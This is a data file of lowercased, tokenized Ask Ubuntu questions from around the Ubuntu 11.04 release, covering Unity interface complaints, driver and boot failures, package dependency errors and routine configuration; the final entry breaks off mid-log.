37722	hard to find one window among many	i am very impressed by the new unity gui -- it 's a bold move . however , there is one glaring oversight , from the point of view of someone who uses ubuntu for professional programming work . i frequently want to have more than a dozen emacs windows open as i 'm writing code . in classic ubuntu , i could easily choose which one i want from the name of the file in the bottom task bar , but this does not seem to have an equivalent in unity . when i have so many open , it 's difficult to find which window i want . for this , event the 10.10 unity was better because i could through and see their names , no more in 11.04 . it would be great if you would add this feature : the new task bar has one emacs box ( for example ) covering all instances of emacs windows open . right click on the box and have the option to see a list of the names of all open instances . presently , the usefulness of right clicking on these taskbar boxes seems very limited anyways . i think a simple change of this nature would greatly improve unity 's utility . thanks for considering ! i already use multiple workspaces ( 6 ) and often have something like a terminal window and many emacs windows per workspace , and i 'm already using keyboard shortcuts . so far , none of these get at the heart of the problem , i do n't think an 'open file list ' is a tall order . [ super ] +w does the exact opposite of what i 'm suggesting . there are already too many windows open on a single workspace to easily find the one i 'm looking for -- viewing all windows on all workspaces just clutters the view even moreso . shift+alt+up does not help . think if i have a dozen emacs windows open on a single workspace . doing this shows all the open windows on the workspace all at once , but spaces them out and shrinks them down to little icons . how am i supposed to figure out at first glance which one i want -- they are indistinguishable . i 'm trying to make a suggestion to developers to simply offer an open file list of the names of the files open so i can easily pick out the one i want . okay , here 's the make-shift solution i 'm going with : start `` gnome-panel '' within unity ; right click and delete the top panel ; configure the bottom panel however you like ; add `` gnome-panel '' to the startup applications ; then restart . the top panel should be permanently deleted ( since it overlaps the unity top panel ) and the bottom panel can show the open file list for the workspace . now the bottom panel can exist in unity -- i like to make it retractable like the launcher .
37726	why is n't lo-menubar installed by default in libreoffice ?	will i face any problems by installing the lo-menubar to give libreoffice global menus in natty ? i 'm wondering why it is n't installed by default . are there stability problems or anything ?
37729	primary user wo n't run firefox 4 after upgrade to natty	i just upgraded from maverick to natty . my main account still runs firefox 3.6 . however , i know that firefox 4 is installed , because i created a new user and it runs firefox 4 . how do i get my main user account to run firefox 4 from unity ? thanks , tim
37734	dual screen different font resolution	i am using ubuntu natty and a dual screen set up with my laptop screen 1280x800 and an external monitor with hdmi connection 1920x1080 both at 60hz refresh rate . fonts on the external screen are blurry . how can i configure them correctly ?
37735	how to install one gui program on ubuntu server ?	i am using ubuntu server 10.10 in a virtualbox . i need to install a single gui program ( rubymine ) on it . i checked out installing ubuntu-desktop with apt-get , and it wants me to install 430 new packages ( including openoffice ) . i installed the server in the first place to keep the install as clean as possible ! how do i do a minimal install of ( all packages needed ) to run that single gui program ? i created a file /etc/apt/apt.conf and added the following : apt : :install-recommends `` 0 '' ; apt : :install-suggests `` 0 '' ; but sudo apt-get install ubuntu-desktop still says : 0 upgraded , 430 newly installed , 1 to remove and 9 not upgraded . need to get 155mb of archives . after this operation , 542mb of additional disk space will be used . do you want to continue [ y/n ] ? n
37746	sensors applet ( temperature ) for ubuntu 11.04 ?	hi everyone ! in oldest versions of ubuntu i used sensors applet that shows temperature of my hard disk and processor on my panel . in ubuntu 11.04 i cant use that . so , is there something for unity maybe that will show me the temperature ? or is there another way to do this ? thanks in advance !
37747	how to remove `` apps available for download '' from the applications lens ?	is there some way to modify the applications lens in unity so that we can remove the `` apps available for download '' section ? the section is really annoying for normal use . we do n't have to know why we can download some random games every time we want to start an application . also , it may make the lens even faster as it will only have to display installed applications rather than creating some random list .
37749	there is no ubuntu one pairing record	i just update to ubuntu 11.04 and then i login to my ubuntuone account via the ubuntuone client . sync works , but i says this error 'there is no ubuntu one pairing record . '
37753	how can i get apt to use a mirror close to me , or choose a faster mirror ?	downloading from the main ubuntu archive is slow even when it 's not release day , how can i get apt-get to automatically use a mirror that is close to me ?
37755	fglrx fails to load causing black screen on boot	i 've updated my system , the system boots but i never get to the graphic interface . it seems to hang . i get a black screen , at the end of the screen , i got my cursor _ blinking and i do n't know what to do . i believe the system is ok somehow , because i notice the screen saver activation after a while but nothing more . if i press any key , the screen savers vanishes but i just do n't know how to leave from this state . i 've tried ctrl + c , entering exit but i just get the letters there , nothing happens . at the end , my /var/log/xorg.0.log has : dri initialization failed kernel module ( fglrx.ko ) may be missing or incompatible 2d and 3d acceleration disabked glesx __g1esxextensioninit : no gl es2.0 capable screen found ! caught signal 11 ( segmentation fault ) . server aborting please consult the x.org foundadion support ( ee ) fglrx ( 0 ) : fireg1_setsuspenderesumestate failed -9 ddxsiggiveup : closing log update : i 've done : sudo apt-get remove -- purge fglrx after which i 've rebooted . now i got nothing on my screen . not even the command line . what can i do ? how can i fix this problem ?
37756	how comes i ca n't use unity with the propietary nvidia driver for my geforce 410m ?	i 've got a 2nd generation intel i5 processor with integrated graphics . in live usb mode , ubuntu uses this one and unity works fine . after installation with automatical updates and 3rd party software installation , i ca n't use unity , and ubuntu seems to use the nvidia grahpics card . though jockey tells me the driver would be activated but not in use . right after login , it tells me i lack 3d support for compiz . after removing the driver , unity works again . even after installing the nouveau driver it works . i 'd be really happy if someone could tell me why that happens and how i 'm able to use unity with the official nvidia driver , because it still is much better than nouveau .
37757	where is ccsm found on my application menu ?	my alt+f2 app is screwed and i ca n't find compiz . how do i start it ? ( do n't think i 'm an idiot just have n't used it and my computer is more than a little screwed up . )
37761	xorg.conf in ubuntu natty 11.04	i am not able to manually configure since i ca n't find my xorg.conf under /etc/x11/ i read in a forum that it got depricated . any insights ?
37766	uniformizing unity icon background color	unity automatically colors the background of each icon to resemble the colors of that icon . i find this disorienting and annoying . is there any way to disable this behavior and attain a uniform icon background coloring ( i.e. , no background color ) .
37767	how to access a usb flash drive from the terminal ? ( how can i mount a flash drive manually ? )	i only have access to the command line i need to backup my data ( on the user folder ) to a pen . i do n't know where/how can i do this is order to access the pen , and then do the cp command . how can we do this ?
37770	some shortcut keys do not work	shortcut keys do not work ctrl + alt + t alt + tab
37771	dual boot with ubuntu 11.04 , opensuse 11.4 and/or fedora 15 beta . does the order matters ?	i 'm planning to have an ubuntu 11.4 / opensuse 11.4 or maybe an ubuntu 11.4 / fedora 15 beta dual boot ( or the three of them ) . will they dual boot just after installation ? or i have to install them in a certain order or do some special configuration ? ( right now i 'm using ubuntu 10.10 )
37776	how can i remove the trash icon from the unity launcher ?	i would like to not show the trash icon at the bottom of the unity launcher . is this possible without having to recompile anything ? : p
37777	can not get new job to run using /etc/crontab and /etc/cron.daily	i want to run a script on a daily basis , and figured that i 'd use the same setup that the other cron jobs are configured on this server - by placing the script in the /etc/cron.daily folder . however , the script was not run overnight - although others in the daily folder were ( logs were rotated , etc ) . the script is owned by root ( as are the original ones in there ) , and the permissions are set to 755 ( as are the original ones in there ) - and the script runs when called manually . i have found this related question cron.hourly wo n't run but do n't find the answers anywhere near satisfactory - sudo crontab -l tells me there is no crontab for root ( although , i know i can created one ) , and it would make more sense to use the same method as the preinstalled jobs anyway rather than split cron configuration . anyone able to point at something i might have missed ? for the record - the script filename is drupal
37783	what 's the difference between sudo and gksudo when launching graphical applications ?	it is common to see in instructions , the terminal command to edit a file : sudo gedit but this will be deemed inadvisable by experienced users , who instead suggest : gksudo gedit the question is , why the distinction and is there any harm using sudo with a graphical application ?
37786	`` permission denied '' errors whe starting a single node cluster in hadoop	i 'm working in ubuntu 10.10 and am trying to start a single node cluster in hadoop . hadoop @ abraham-dimension-3000 : /usr/local/hadoop $ bin/start-all.sh mkdir : can not create directory `/usr/local/hadoop/bin/../logs ' : permission denied starting namenode , logging to /usr/local/hadoop/bin/../logs/hadoop-hadoop-namenode-abraham-dimension-3000.out /usr/local/hadoop/bin/hadoop-daemon.sh : line 117 : /usr/local/hadoop/bin/../logs/hadoop-hadoop-namenode-abraham-dimension-3000.out : no such file or directory head : can not open `/usr/local/hadoop/bin/../logs/hadoop-hadoop-namenode-abraham-dimension-3000.out ' for reading : no such file or directory localhost : mkdir : can not create directory `/usr/local/hadoop/bin/../logs ' : permission denied localhost : starting datanode , logging to /usr/local/hadoop/bin/../logs/hadoop-hadoop-datanode-abraham-dimension-3000.out localhost : /usr/local/hadoop/bin/hadoop-daemon.sh : line 117 : /usr/local/hadoop/bin/../logs/hadoop-hadoop-datanode-abraham-dimension-3000.out : no such file or directory localhost : head : can not open `/usr/local/hadoop/bin/../logs/hadoop-hadoop-datanode-abraham-dimension-3000.out ' for reading : no such file or directory localhost : mkdir : can not create directory `/usr/local/hadoop/bin/../logs ' : permission denied localhost : starting secondarynamenode , logging to /usr/local/hadoop/bin/../logs/hadoop-hadoop-secondarynamenode-abraham-dimension-3000.out localhost : /usr/local/hadoop/bin/hadoop-daemon.sh : line 117 : /usr/local/hadoop/bin/../logs/hadoop-hadoop-secondarynamenode-abraham-dimension-3000.out : no such file or directory localhost : head : can not open `/usr/local/hadoop/bin/../logs/hadoop-hadoop-secondarynamenode-abraham-dimension-3000.out ' for reading : no such file or directory mkdir : can not create directory `/usr/local/hadoop/bin/../logs ' : permission denied starting jobtracker , logging to /usr/local/hadoop/bin/../logs/hadoop-hadoop-jobtracker-abraham-dimension-3000.out /usr/local/hadoop/bin/hadoop-daemon.sh : line 117 : /usr/local/hadoop/bin/../logs/hadoop-hadoop-jobtracker-abraham-dimension-3000.out : no such file or directory head : can not open `/usr/local/hadoop/bin/../logs/hadoop-hadoop-jobtracker-abraham-dimension-3000.out ' for reading : no such file or directory localhost : mkdir : can not create directory `/usr/local/hadoop/bin/../logs ' : permission denied localhost : starting tasktracker , logging to /usr/local/hadoop/bin/../logs/hadoop-hadoop-tasktracker-abraham-dimension-3000.out localhost : /usr/local/hadoop/bin/hadoop-daemon.sh : line 117 : /usr/local/hadoop/bin/../logs/hadoop-hadoop-tasktracker-abraham-dimension-3000.out : no such file or directory localhost : head : can not open `/usr/local/hadoop/bin/../logs/hadoop-hadoop-tasktracker-abraham-dimension-3000.out ' for reading : no such file or directory hadoop @ abraham-dimension-3000 : /usr/local/hadoop $ i have no clue what i 'm doing wrong or what some of these errors suggest . hadoop @ abraham-dimension-3000 : /usr/local/hadoop $ jps 5099 jps can anyone with diagnosing the problem .
37787	how do i get the touchpad on a mbp 7,1 working ?	i upgraded from ubuntu 10.10 to ubuntu 11.04 and now my touchpad does n't work . please explain how to fix it thoroughly , because i 'm a newbie . thanks
37792	recover ubuntu - after failing update to version 11.04	fglrx fails to load causing black screen on boot . i need to recover my ubuntu ( perhaps to the previous 10.10 version ) . is there a way for doing so ? i mean , perhaps after ubuntu tried to update , it has place some restore point that we may now use to recover ? thanks
37793	how can i hide one wine app from the unity panel without blacklisting all wine apps ?	i would like a wine app to run in the background without appearing in unity 's panel . the app , by the way , is `` air video server '' , in case that matters . is there any way ( command line is fine ) to start the application with no tray icon ? ( other than blacklisting all wine apps from the notification area , if possible )
37796	nautilus file copy from smb : //server/share is 25msec but when i mount its 4msec	folks : when i open nautilus in 11.04 , browse network - > mshome - > servername - > share and do a copy , i get gigabit speed at around 25 megs a sec to local disk . when i mount in fstab with //servername/sharename /media/mountname cifs guest , uid=1000 , iocharset=utf8 , codepage=unicode , unicode 0 0 i only get 4 megs a sec to local disk . what am i doing wrong when i automount versus nautilus on the browse ?
37799	menu bar for thunderbird	i installed 11.04 today and i seem to be missing the menu bar in thunderbird . i do n't have either the integrated menu bar in the top panel or any other menu option . is this a bug or am i missing something ?
37802	unable to shutdown/restart/hibernate	after i installed ubuntu 11.04 , it wont shutdown nor restart , it just freeze , and i have to hold the power button in order to turn off my netbook . ( it also happens on livecd ) can anyone tell me the solution for this ?
37806	how to add sound applet to `` taskbar '' in gnome 3 ?	does anyone here knows how to add a sound applet or volume control to the taskbar or gnome 3 ? in order to mute , i 'm using maverick
37809	when manually setting up hard drives in the installer , how can i set custom mount points ?	with previous versions of ubuntu , you could specify mount points for various hard drives and partitions during the installation process . this was useful , because i have a backup hard drive that i set to mount at /media/backup . when installing ubuntu 11.04 , i can see the box that i used to type this info into , but it does n't allow keyboard input and i can only choose the pre-defined mount points ( e.g . `` / '' and `` /home '' ) .
37812	why do n't the launcher/other new features show up ?	i 'm a bit of a linux noob . i just successfully burned a cd with ubuntu 11.04 ( released today , april 28 , 2011 ) , and i loaded it on my windows computer running xp . it works great just like it did when i tried out 10.10 . however , it seemed no different from 10.10 - the launcher ( dock ) , dash , workspaces were not available . when i clicked on the logo in the top left corner of the screen , on the applications menu showed up ( just like in 10.10 ) . can someone help me ? i 'm still just using the demo , i have n't installed it yet . will installing it enable these features ? thank you .
37814	how does unity 's dash index and search work ?	what kind of items and which attributes are indexed ? e. g. desktop/launchers , documents ; what metadata ? where 's the index stored ? sqlite , couchdb , ... ? which query language is used ; what 's the query like ? how are results ranked/ordered ? i 'd like to see an example query .
37817	missing build dependencies when upload to launchpad	bit of a different question . i 'm trying to upload a package to a repository that i just started on launchpad . launchpad accepts the upload happily , and everything seems good up until the build . it cuts itself short part-way through , reporting `` missing build dependencies : libswfdec-0.8-dev '' . now , this package is listed in the control file . so i 'm not sure what 's going on here , but i feel like it 's a very novice mistake , since this is my first ( attempted ) upload . the main page shows the following text : build status dependency wait on king ( virtual ) retry this build missing build dependencies : libswfdec-0.8-dev started 5 minutes ago finished 2 minutes ago ( took 3 minutes , 30.4 seconds ) buildlog ( 4.3 kib ) and the buildlog shows ( amongst other things ) : libswfdec-0.8-dev : missing libswfdec-0.8-dev : does not exist this of course , compiles fine on my system . if anybody has a suggestion , i would really appreciate it .
37818	are appindicators and notifyosd useful for other than ubuntu 's gnome users ?	are applications that use notifyosd and appindicators compatible with general gnome or would e.g . a user of another distribution first need to install some ubuntu libraries to have the same experience ? in case , what are gnome 's default notification and indicator systems ? developing gnome applications , what should i use/implement ?
37820	startup splash screen flashes then black screen	i just tried upgrading from 10.10 to 11.04 . everything went smoothly until the very end when it gave a message saying that there was a problem with the installation , but it still completed and told me to restart the computer to complete the installation . after i restarted , it went to the grub screen fine . when i selected ubuntu it started loading , flashed the ubuntu splash screen for a second and then goes to a black screen and appears to freeze with no disk activity . if i reboot , the same thing happens . if i try rebooting in recovery mode from the grub screen and then selecting resume normal boot , it gets me to a working command prompt . i tried running 'startx ' from the command prompt but that fails also . in the xorg.0.log file it says , among other things , that : failed to load module 'intel ' ( module requirement mismatch , 0 ) and also , it fails to load the modules 'vesa ' and 'fbdev ' . i really have no idea what that means , but i 'm guessing the error has something to do with a mismatch with my intel video card . i am running it on a compaq presario v6000 laptop . would appreciate any help , as i have no clue what to do next . i 've searched the forums , but i ca n't find anything that works . the computer was running absolutely fine on 10.10 and now all of a sudden this fails on upgrade !
37822	how do i install apache tomcat 7 ?	troubleshooting with apache tomcat 7 steps should be followed ... . after downloading apache-tomcat 7 // open terminal go to that downloading file folder in which tar.gz file is still . untar the tar file tar -xzvf filename.tar.gz move a extracted directory of apache-tomcat7 in current path sudo mv directory_name ( extracted eg.apache-tomcat 7.0.32 ) /usr/local/tomcat7 to set environment variable for tomcat7 sudo nano /usr/local/tomcat7/bin/setenv.sh then nano editor will open .. java_home =/usr/lib/jvm/java-6-sun export catalina_opts= '' $ catalina_opts -xms128m -xmx1024m -xx : maxpermsize=256m after hit ctrl+x to save file to set the role and username and password . sudo nano /usr/local/tomcat7/conf/./tomcat-users.xml < role rolename= '' manager-gui '' / > < role rolename= '' manager-script '' / > < role rolename= '' manager-jmx '' / > < role rolename= '' manager-status '' / > < user username= '' admin '' password= '' admin '' roles= '' manager-gui , manager-script , manager-jmx , manager-status '' / > ctrl+x to save file if port no confliction comes in a way then open file to change the port no . sudo nano /usr/local/tomcat7/conf/./server.xml then change the connector port as you want ... .
37824	what is the best way to configure a thinkpad 's trackpoint ?	the previously useful thinkwiki pages appear quite outdated . i am trying to permanently change my trackpoint sensitivity and speed settings and enable middle mouse button scrolling . i have tried configure-trackpoint in the past , but the settings were not saved permanently ( they are lost after restart ) . i have tried gpointing-device-settings . using it , i can get middle mouse button scrolling to work , but i can not change the speed or sensitivity settings of the trackpoint . all methods on the thinkwiki page that i 've tried do not work as directed in ubuntu 11.04 . can someone explain how to permanently edit the trackpoint settings so that i can use it correctly ?
37826	quicklist for google chrome ( for bookmarks , new windows , etc ) not working properly	i tried to make a quicklist for google chrome by editing the .desktop file in /opt/google/chrome but there is a small problem if i already have an instance of google chrome running and then i use the quicklist 's shorcuts , the new google chrome opens in the same icon as the first one , adding the triangle to the left ( just as it is supposed to ) if , though , i do n't have an instance of chrome already running and i use one of the shorcuts i get the new window in its own icon on the launcher - making the launcher have two google chrome icons : one with the quicklist enabled and one without it . the code i used for the quicklist is : x-ayatana-desktop-shortcuts=newwindow ; incognito ; googlereader ; `` some more shorcuts here ... '' name [ en_us ] =google chrome [ newwindow shortcut group ] name=new window exec=/opt/google/chrome/google-chrome targetenvironment=unity [ incognito shortcut group ] name=new incognito window exec=/opt/google/chrome/google-chrome -- incognito targetenvironment=unity [ googlereader shortcut group ] name=google reader exec=/opt/google/chrome/google-chrome % u http : //www.google.com/reader/view/ ? hl=en # overview-page targetenvironment=unity and some more exactly like the google reader 's shortcut group for the other shorcuts can someone help me with getting a working quicklist on chrome ? i 'm pretty sure others would like to use it too .
37829	simple-ccsm wo n't install	i 'm trying to install simple-ccsm 0.8.2-0ubuntu1 in natty narwhal , but i receive an error : simple-ccsm : depends : python-compizconfig but it is not going to be installed depends : compizconfig-settings-manager but it is not going to be installed
37832	how can i revert back to initial configuiration of 11.04 ?	is any way to return to the initial configuration of my ubuntu ? ? , something happened to my desktop and my launcher and the dash disappeared so i do n't have access to the configuration . is there a way to configure or return to the initial settings ?
37833	how to reset visualization in movie player to default when it always crashes on launch ?	i changed the visualization option in a working movie player from goom to one of the options using libvisual . now the program automatically freezes whenever it is opened , the preferences menu can not be reached , and must be force quit-ed to close . i have a feeling it wo n't work again until the visualization setting is reset . however , `` sudo apt-get purge totem '' followed by `` apt-get install totem '' does not work ! the viewer window is still black and the program freezes when it is opened . additional context : i initially was looking at the visualization menu because i wanted to install projectm http : //projectm.sourceforge.net/ ( milkdrop for linux ) and did `` sudo apt-get install libvisual-projectm '' . however , it did not appear in the menu , and i selected one of the existing included libvisual plugins instead . so the projectm problem is probably an unrelated bug .
37834	lost unity panel - how to recover it ?	i 've installed 11.04 but some windows effects were off , so i tried to re-enable them . while in the process , however , i ended up losing that handy menu ( normally on top ) where we have the ubuntu icon , and the volume and shutdown menus . how can we restore that panel ? thanks in advance .
37836	application indicators do n't seem to have tooltips -- is this due to conformity to touch interfaces ?	i very much liked the weather details showing up simply by way of mouse over the weather icon of the datetime applet . ( the indicator-weather shows similar infos only via click , currently as menu items that ca n't be clicked but are highlighted as if ... )
37842	only mouse is responsive after closing laptop lid	i just upgraded to 11.04 and have been having this issue . i 'm using the unity interface , my card is an intel gm965 . when i close my laptop lid i have it set to just blank screen . when i open the lid again , the mouse moves but nothing is responsive . i can switch to a terminal but when i switch back , the terminal text remains there with just the mouse moving again . i have to do a gdm restart to get unity back .
37843	where do i place a file for bookmarks for all users	with previous versions of firefox i put my bookmarks.html file in /etc/firefox/profile and all new user accounts got automatically these bookmarks . this folder does n't exist on ubuntu 11.04 ; i tried to create it and put the bookmarks.html file in it but it does n't seem to work ...
37847	is there a command that returns network utilization ?	i need a command that i can run that returns the current utilization of wlan0 . does such a tool exist ? i would prefer something that does n't require root privileges .
37849	resolution set too low on startup , solutions do not work	after installing natty , my resolution is being set to 1024x768 instead of the proper 1368x768 . the monitors program does n't allow me to set my resolution higher . i looked around for a solution , and i found instructions on using xrandr to set a new resolution : xrandr -- newmode `` 1368x768_60.00 '' 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync xrandr -- addmode vga1 1368x768_60.00 xrandr -- output vga1 -- mode 1368x768 this worked ( but it broke the top unity panel ) . now i need to find a way to automatically start the xrandr commands on boot . i edited /etc/gdm/init/default and ~/.xprofile , but neither worked . what do i do ? can i stop the problem from happening in the first place ?
37855	when installing haskell , dependency is not satisfiable : ghc6 ( < 6.12.1+ )	what does that mean , can i not install haskell ? i just upgraded to natty , is that the reason ? as you can see in the screenshot i get this problem in the software centre : the following packages have unmet dependencies : haskell-platform : depends : ghc6 ( < 6.12.1+ ) but 6.12.3-1ubuntu7 is to be installed depends : libghc6-cgi-dev ( > = 3001.1.7.2 ) but 3001.1.7.2-1build1 is to be installed depends : libghc6-fgl-dev ( < 5.4.2.2+ ) but 5.4.2.2-2build2 is to be installed depends : libghc6-glut-dev ( < 2.1.2.1+ ) but 2.1.2.1-1build1 is to be installed depends : libghc6-haskell-src-dev ( < 1.0.1.3+ ) but 1.0.1.3-2build1 is to be installed depends : libghc6-html-dev ( < 1.0.1.2+ ) but 1.0.1.2-3build2 is to be installed depends : libghc6-hunit-dev ( < 1.2.2.1+ ) but 1.2.2.1-2build2 is to be installed depends : libghc6-mtl-dev ( < 1.1.0.2+ ) but 1.1.0.2-10build2 is to be installed depends : libghc6-network-dev ( < 2.2.1.7+ ) but 2.2.1.7-1build2 is to be installed depends : libghc6-opengl-dev ( < 2.2.3.0+ ) but 2.2.3.0-2build2 is to be installed depends : libghc6-parallel-dev ( < 2.2.0.1+ ) but 2.2.0.1-1build1 is to be installed depends : libghc6-parsec2-dev ( < 2.1.0.1+ ) but 2.1.0.1-2build2 is to be installed depends : libghc6-quickcheck2-dev ( < 2.1.0.3+ ) but 2.1.0.3-1build2 is to be installed depends : libghc6-regex-base-dev ( < 0.93.1+ ) but 0.93.1-8build1 is to be installed depends : libghc6-regex-compat-dev ( < 0.92+ ) but 0.92-6build2 is to be installed depends : libghc6-regex-posix-dev ( < 0.94.1+ ) but 0.94.1-2build1 is to be installed depends : libghc6-stm-dev ( < 2.1.1.2+ ) but 2.1.1.2-5build2 is to be installed depends : libghc6-xhtml-dev ( > = 3000.2.0.1 ) but 3000.2.0.1-6build2 is to be installed depends : libghc6-zlib-dev ( < 0.5.2.0+ ) but 0.5.2.0-4build2 is to be installed depends : libghc6-http-dev ( > = 40000009 ) but 40000009-2build1 is to be installed depends : libghc6-deepseq-dev ( < 1.1.0.0+ ) but 1.1.0.0-2build1 is to be installed depends : alex ( < 2.3.3+ ) but 2.3.3-1 is to be installed depends : happy ( < 1.18.4-2+ ) but 1.18.4-2 is to be installed depends : haddock but it is a virtual package
37857	several grub error messages on startup	fresh natty installation gives me some grub error messages on startup : error : file not found . error : file not found . error : no suitable mode found . error : no video mode activated . error : file not found . error : file not found . regardless of these errors it boots up . it probably is somewhat related to my previous question as i specified the partitions manually and ended up in the grub recovery console . to solve that i booted from live cd and ran : sudo mount /dev/sda3 /mnt sudo mount /dev/sda1 /mnt/boot sudo grub-install -- root-directory=/mnt /dev/sda do those errors matter ? how to get rid of them ?
37864	ubuntu package repository backup problem	i want to install new ubuntu 11.04 released yesterday , and my system currently has ubuntu 10.10 . i have installed many packages related to my college project after 10.10 installation . is there any script/code to find which packages i have installed after linux installation or packages other than default so that i can install them in new ubuntu version in one chance rather than on requirements again ?
37868	how do i add a new application type in refine search ?	in unity , i 'd like to add a new application type in the `` refine search '' section of the main menu , so i could group my applications here . how could i do that ?
37870	see files on an iso dvd without burning it to disc ?	i use daemon tools in windows to see files in an iso dvd image . are there any tools like that on ubuntu ? how do i see the files in an iso dvd image without burning it to disc ?
37882	how to disable auto-hiding of the application 's menu in top panel ?	unity comes with features from mac os x , but one of them is modified and is very frustrating me . when you open any application , you can see only title of it in the top panel . but after you move mouse to the panel , menu of the application is displayed - why menu ca n't be displayed always as in os x ? everytime i want to select some item from menu , i have to move with cursor to panel , then read menu items and then i can select something ... i would be very glad when i could reconfigure this behavior . thanks
37883	ca n't use external monitor via hdmi	i have an external monitor that is connected to my laptop via hdmi . i just upgraded to natty and i can no longer redirect my video output to it using fn+f8 . how can i get my external monitor working again ? hardware is a dell xps m1530 . it seems that i can twiddle with the nvidia settings and get configuration i am looking for , so i guess the real question is : how can i get fn+f8 to switch my video out between monitors like it used to ?
37884	how do i enable the emusic store in banshee ?	does anyone know how i can enable the emusic store extension as demoed at http : //blogs.gnome.org/wjjt/2011/03/13/emusic-in-banshee/ ? i have enabled the `` emusic import '' extension available in preferences- > extensions , but that only lets you import emusic files , as opposed to browsing the web site within banshee ( as with amazon ) .
37885	unity available from live-cd but not after upgrade from 10.10 . how to fix ?	unity works perfectly fine on my dell e6400 ( intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) == intel gma 4500mhd ? ) when run from live-cd . however it does n't work on my 11.04 which was upgraded from 9.10- > 10.04- > 10.10 . what might be broken/misconfigured ? is there any `` trick '' i can enable 3d acceleration without reinstalling complete system ? edit : unity support test gives following output : /usr/lib/nux/unity_support_test -p opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri mobile intel速 gm45 express chipset gem 20100330 development x86/mmx/sse2 opengl version string : 2.1 mesa 7.10.2 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity supported : yes
37893	how can i open another window of an application in unity 2d e.g . another terminal ?	i prefer a keyboard shortcut..
37894	is there a gmail notifier that integrates with the messaging menu ?	how can i get it back in natty 11.04 ? thanks .
37895	dell inspiron m5010 gets slow after upgrade	i have recently updated ubuntu from 10.10 to 11.04 on my dell inspiron m5010 laptop . the problem is that ubuntu became incredibly slow . for example during installation files were copied in few minutes but system was configuring like 1.5 hour . also i am able to start ubuntu after isntallation but it takes up to 15 minutes to boot to desktop . all commands in terminal take a lot of time etc . i tried disabling/enabling bios options but there was no use . i guess that the new kernel may be th issue . any ideas ?
37901	is there a way to regain preview workspace functionality in unity ?	in unity the workspace switcher does n't display active workspace number or a preview of workspaces like in previous versions . it 's not comfortable to click on workspace switcher to look for a window and than double click to select it . i would like the workspace switcher to display more information . and i know of indicator-workspaces but it 's not enough to regain all the lost functionality .
37904	how do i create a desktop launcher ?	now i am a new convert from windows to ubuntu and i really like what i am seeing , however being a newbie i cant seem to figure out how to create a `` launcher '' on the desktop . i know that you right click and then select `` create launcher '' ; what i dont know is the command that i need to use or indeed where to browse to the application ( evolution mail for example ) or where to learn the commands from . if someone could help this newbie out i would appreciate it ! thanks
37905	unknown keyword in installer : ubuntu 11.04 boot from usb	i 've just downloaded ubuntu 11.04 ( have n't we all ? ) and created a bootable usb with my existing 10.04lts installation . however , when i try to boot it it gives me a message similar to : unknown keyword in installer . and leaves me at a boot : _ promt ( which does not do anything ) any solutions will be incredibly helpful , because i want to use new ubuntu !
37910	after login , desktop appears but there 's no menu bar and no dash	after logging in , the desktop appears , and seems to work fine ( i can start applications from desktop icons , for example , and right clicking on the desktop area brings up the expected context menu ) , but there 's no menu bar and no dash . how can i fix/diagnose this problem ? this is a very standard clean ubuntu 11.04 install with only a few fairly standard applications added , such as chrome , dropbox and skype . the only login style that appears to work is `` ubuntu ( safe mode ) '' -- the two ubuntu class styles give the same results as `` ubuntu '' . i 've tried looking in /var/log for messages but there 's nothing obvious . if i create another user account , and login as that user , everything works as expected .
37915	what is that dell laptop on ubuntu home page ?	with the release of natty narwhal , the ubuntu homepage is sporting a new look - the one with a dell laptop . i 'm interested to know what dell laptop model is that ? it looks really nice but i ca n't find it on dell website . i found a similar looking vostro but not the same exact model . if anyone has any idea what it is , please post a link . and sorry if questions like this one are not allowed here . this does not seem to be a technical question more of sales . : d
37936	unity does n't start	i downloaded ubuntu 11.04 onto a usb stick in order to run a live version from there . for some reason , unity does n't start , but gnome does . also , i tried changing the session environment ( e.g. , ubuntu/classic ) , but they all load gnome . so , why does n't unity work ?
37945	can i install gnu hurd in ubuntu ?	is it possible to use hurd kernel on ubuntu ( any version ) ? it would be good to see other kernels running with ubuntu . but i really wonder is it even possible ?
37947	crash during installation of flashplugin-installer after upgrade	i ca n't install flashplugin-installer after having upgraded from maverick to natty . something crashes during the installation : $ sudo aptitude install flashplugin-installer the following new packages will be installed : flashplugin-installer nspluginwrapper { a } 0 packages upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 185 kb of archives . after unpacking 770 kb will be used . do you want to continue ? [ y/n/ ? ] get:1 http : //dk.archive.ubuntu.com/ubuntu/ natty/multiverse nspluginwrapper amd64 1.2.2-0ubuntu9 [ 175 kb ] get:2 http : //dk.archive.ubuntu.com/ubuntu/ natty/multiverse flashplugin-installer amd64 10.2.159.1ubuntu1 [ 9.370 b ] fetched 185 kb in 1s ( 180 kb/s ) preconfiguring packages ... selecting previously deselected package nspluginwrapper . ( reading database ... 303033 files and directories currently installed . ) unpacking nspluginwrapper ( from ... /nspluginwrapper_1.2.2-0ubuntu9_amd64.deb ) ... selecting previously deselected package flashplugin-installer . unpacking flashplugin-installer ( from ... /flashplugin-installer_10.2.159.1ubuntu1_amd64.deb ) ... processing triggers for man-db ... setting up nspluginwrapper ( 1.2.2-0ubuntu9 ) ... plugin dirs : : /var/lib/flashplugin-installer/ auto-update plugins from /usr/lib/mozilla/plugins looking for plugins in /usr/lib/mozilla/plugins segmentation fault dpkg : error processing nspluginwrapper ( -- configure ) : subprocess installed post-installation script returned error exit status 139 dpkg : dependency problems prevent configuration of flashplugin-installer : flashplugin-installer depends on nspluginwrapper ( > = 0.9.91.4-2ubuntu1 ) ; however : package nspluginwrapper is not configured yet . dpkg : error processing flashplugin-installer ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : nspluginwrapper flashplugin-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up nspluginwrapper ( 1.2.2-0ubuntu9 ) ... plugin dirs : : /var/lib/flashplugin-installer/ auto-update plugins from /usr/lib/mozilla/plugins looking for plugins in /usr/lib/mozilla/plugins segmentation fault dpkg : error processing nspluginwrapper ( -- configure ) : subprocess installed post-installation script returned error exit status 139 dpkg : dependency problems prevent configuration of flashplugin-installer : flashplugin-installer depends on nspluginwrapper ( > = 0.9.91.4-2ubuntu1 ) ; 